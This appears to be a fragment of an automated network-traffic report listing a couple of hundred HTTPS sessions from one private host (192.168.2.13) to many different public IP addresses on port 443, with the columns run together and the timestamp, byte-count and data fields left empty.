                              Session IDSource IPSource PortDestination IPDestination Port
                              12232192.168.2.1355984161.145.229.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12233192.168.2.1359592211.220.73.122443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12234192.168.2.134373420.150.207.165443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12235192.168.2.134938227.113.178.34443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12236192.168.2.1340122153.68.171.33443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12237192.168.2.135837071.143.228.161443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12238192.168.2.135250044.52.189.128443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12239192.168.2.1348134182.248.239.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12240192.168.2.1336882162.125.80.41443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12241192.168.2.1341220119.106.68.53443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12242192.168.2.134553225.137.204.2443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12243192.168.2.1345894141.243.194.102443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12244192.168.2.1351388108.77.42.178443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12245192.168.2.1356058111.206.174.54443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12246192.168.2.1355686203.24.225.100443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12247192.168.2.1360730157.53.77.153443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12248192.168.2.135156897.193.42.180443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12249192.168.2.135925442.218.251.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12250192.168.2.1355312192.198.10.89443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12251192.168.2.133941432.252.209.99443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12252192.168.2.1336458216.168.17.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12253192.168.2.133447061.237.158.157443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12254192.168.2.134573624.74.129.13443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12255192.168.2.1346020202.88.9.176443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12256192.168.2.135794288.127.230.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12257192.168.2.134262257.50.213.53443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12258192.168.2.1335144118.110.222.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12259192.168.2.136068634.90.43.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12260192.168.2.1353478222.174.147.56443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12261192.168.2.1334006220.8.107.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12262192.168.2.135819884.215.0.184443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12263192.168.2.1352134109.131.191.135443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12264192.168.2.133348037.209.79.34443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12265192.168.2.1339968206.82.7.217443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12266192.168.2.1345080116.53.110.65443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12267192.168.2.1336698114.74.16.226443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12268192.168.2.1337846156.8.228.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12269192.168.2.135711235.112.38.204443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12270192.168.2.133299636.42.34.255443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12271192.168.2.1336292144.233.222.45443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12272192.168.2.133944868.129.58.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12273192.168.2.134671499.208.84.184443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12274192.168.2.134730049.206.248.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12275192.168.2.1350784216.12.144.167443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12276192.168.2.1340340156.15.164.126443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12277192.168.2.135869281.222.20.134443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12278192.168.2.1339066122.244.156.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12279192.168.2.1343956132.121.226.40443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12280192.168.2.1338900204.126.206.24443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12281192.168.2.135668672.210.89.85443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12282192.168.2.1350602201.112.98.180443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12283192.168.2.1350122159.137.240.52443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12284192.168.2.1350700143.143.242.250443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12285192.168.2.1355052151.200.169.94443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12286192.168.2.1336188121.175.57.142443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12287192.168.2.133429064.71.178.166443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12288192.168.2.134663074.137.125.13443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12289192.168.2.1339840222.250.61.178443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12290192.168.2.133301853.68.221.55443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12291192.168.2.1352368194.161.38.96443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12292192.168.2.1358928133.220.160.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12293192.168.2.1360104208.237.45.138443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12294192.168.2.1360682111.155.246.96443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12295192.168.2.135136638.76.230.190443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12296192.168.2.133706850.179.38.217443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12297192.168.2.134704071.229.221.106443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12298192.168.2.133419463.54.23.133443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12299192.168.2.1349514169.119.65.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12300192.168.2.1339440152.91.1.239443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12301192.168.2.1344034120.69.235.101443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12302192.168.2.134240253.245.188.85443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12303192.168.2.1339326201.70.33.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12304192.168.2.1335756105.148.75.166443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12305192.168.2.134190888.83.206.62443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12306192.168.2.135588282.168.168.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12307192.168.2.135081260.37.66.12443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12308192.168.2.1333492119.120.26.132443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12309192.168.2.1347934188.224.50.134443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12310192.168.2.1341774175.21.228.216443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12311192.168.2.133996490.187.237.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12312192.168.2.1355250199.192.192.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12313192.168.2.134776436.98.56.194443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12314192.168.2.134916683.135.249.179443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12315192.168.2.133297477.130.133.219443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12316192.168.2.1360488140.113.202.185443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12317192.168.2.134020686.182.190.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12318192.168.2.133561819.146.137.32443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12319192.168.2.1353912203.98.93.6443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12320192.168.2.134947813.241.251.142443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12321192.168.2.1344764147.141.184.74443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12322192.168.2.1336590135.96.113.221443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12323192.168.2.134560497.17.33.3443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12324192.168.2.1333098171.13.19.155443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12325192.168.2.135973684.218.78.195443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12326192.168.2.133509081.161.226.197443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12327192.168.2.1351266219.201.117.138443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12328192.168.2.135856634.185.185.190443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12329192.168.2.1341336174.141.48.255443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12330192.168.2.1340062142.158.124.55443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12331192.168.2.133538872.5.66.130443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12332192.168.2.135898036.228.108.239443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12333192.168.2.134581074.186.93.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12334192.168.2.134329853.112.163.169443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12335192.168.2.1337042124.139.8.16443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12336192.168.2.1355296103.224.142.170443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12337192.168.2.136047067.117.7.234443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12338192.168.2.1358774177.49.8.78443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12339192.168.2.1356820106.152.238.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12340192.168.2.1343862222.132.45.73443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12341192.168.2.1348672117.1.101.85443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12342192.168.2.133797253.62.2.111443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12343192.168.2.134499081.29.228.11443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12344192.168.2.1337464197.52.200.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12345192.168.2.1343160202.50.120.167443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12346192.168.2.1352346128.202.7.54443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12347192.168.2.13387184.82.138.124443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12348192.168.2.1338214197.77.153.160443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12349192.168.2.133602613.148.153.84443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12350192.168.2.1356002148.47.217.94443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12351192.168.2.1334772137.32.24.96443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12352192.168.2.1336760148.11.1.159443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12353192.168.2.134027095.206.181.18443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12354192.168.2.1340702181.117.217.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12355192.168.2.1346812132.160.58.94443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12356192.168.2.134493837.85.2.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12357192.168.2.1347648197.193.169.57443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12358192.168.2.1339240201.42.145.235443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12359192.168.2.1343500172.9.159.236443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12360192.168.2.1348200138.57.118.247443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12361192.168.2.136090487.54.206.56443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12362192.168.2.1357110162.35.4.125443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12363192.168.2.1343966125.89.228.70443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12364192.168.2.133792245.68.42.243443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12365192.168.2.1360820207.76.84.134443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12366192.168.2.1337828138.104.171.96443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12367192.168.2.136092283.192.186.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12368192.168.2.1350680113.206.204.88443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12369192.168.2.134291441.242.166.60443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12370192.168.2.136041248.142.78.85443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12371192.168.2.13513949.236.193.161443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12372192.168.2.1353482110.214.106.186443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12373192.168.2.1338686123.35.101.108443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12374192.168.2.1340382101.29.214.221443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12375192.168.2.1360590185.255.186.61443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12376192.168.2.1358852110.149.210.212443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12377192.168.2.1353388131.65.90.80443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12378192.168.2.1352382166.67.66.126443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12379192.168.2.1343118136.49.204.209443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12380192.168.2.1353938210.189.80.36443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12381192.168.2.136002698.121.232.187443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12382192.168.2.1345558199.208.144.168443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12383192.168.2.133387270.24.30.230443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12384192.168.2.1335242186.2.171.15443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12385192.168.2.1342282209.244.206.252443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12386192.168.2.13540465.131.228.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12387192.168.2.1333444216.194.197.21443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12388192.168.2.1355002113.202.250.246443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12389192.168.2.1346868166.42.191.223443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12390192.168.2.1348328186.15.6.139443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12391192.168.2.1341048140.177.157.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12392192.168.2.133598641.101.30.2443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12393192.168.2.134332060.140.2.74443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12394192.168.2.1353848123.232.101.171443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12395192.168.2.1343022159.233.225.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12396192.168.2.134277438.197.181.140443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12397192.168.2.135972412.42.225.9443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12398192.168.2.1342500150.176.64.249443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12399192.168.2.1356180136.102.143.24443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12400192.168.2.1357280181.221.74.40443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12401192.168.2.13471225.116.142.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12402192.168.2.133852472.31.66.143443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12403192.168.2.133617880.13.219.58443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12404192.168.2.1337606172.169.90.138443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12405192.168.2.1336584222.35.238.178443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12406192.168.2.134662889.137.232.201443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12407192.168.2.1348012140.143.167.208443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12408192.168.2.133286835.228.155.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12409192.168.2.135179879.19.249.189443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12410192.168.2.133430240.6.110.21443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12411192.168.2.135043618.17.164.64443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12412192.168.2.1336368124.110.86.133443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12413192.168.2.134623899.58.176.175443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12414192.168.2.133324676.211.5.169443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12415192.168.2.1358992104.192.211.31443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12416192.168.2.1344684149.24.3.22443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12417192.168.2.135309251.177.155.81443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12418192.168.2.1343054152.10.2.213443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12419192.168.2.1339034109.56.104.144443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12420192.168.2.1333242136.114.142.188443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12421192.168.2.133351437.36.248.152443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12422192.168.2.134893620.71.77.158443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12423192.168.2.1344520159.37.169.193443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12424192.168.2.1334020117.93.236.248443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12425192.168.2.1359028151.126.151.48443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12426192.168.2.1344370174.78.53.73443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12427192.168.2.1353216181.59.127.14443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12428192.168.2.1343382197.242.221.25443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12429192.168.2.1333072197.244.243.156443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12430192.168.2.1336960117.126.14.83443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12431192.168.2.134151245.14.75.73443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12432192.168.2.135070218.52.109.23443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12433192.168.2.133678043.170.207.199443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12434192.168.2.133371877.242.238.198443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12435192.168.2.1349768108.217.195.34443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12436192.168.2.1342094121.142.223.227443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12437192.168.2.13576008.172.140.198443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12438192.168.2.134466487.133.31.177443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12439192.168.2.135169636.158.217.0443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12440192.168.2.1338934126.5.138.237443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12441192.168.2.1358914213.108.137.231443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12442192.168.2.1354366156.217.96.190443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12443192.168.2.1344766158.120.135.10443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12444192.168.2.1359656181.89.158.251443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12445192.168.2.135452027.158.119.243443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12446192.168.2.135078436.79.49.39443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12447192.168.2.13383869.179.111.168443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12448192.168.2.1346742132.50.35.164443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12449192.168.2.1347510134.77.100.3443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12450192.168.2.1358382177.223.205.28443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12451192.168.2.135000276.157.194.182443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12452192.168.2.1360144123.92.60.234443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12453192.168.2.135895066.123.92.106443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12454192.168.2.135951212.134.62.232443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12455192.168.2.1341988189.25.167.140443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12456192.168.2.135921614.195.131.210443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12457192.168.2.1349112114.131.252.153443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12458192.168.2.133509632.201.191.67443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12459192.168.2.1358958218.194.86.20443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12460192.168.2.135398077.214.39.134443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12461192.168.2.1343236207.8.138.44443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12462192.168.2.134586642.28.171.120443
                              TimestampBytes transferredDirectionData


                              Session IDSource IPSource PortDestination IPDestination Port
                              12463192.168.2.1336196141.190.44.169443
                              TimestampBytes transferredDirectionData


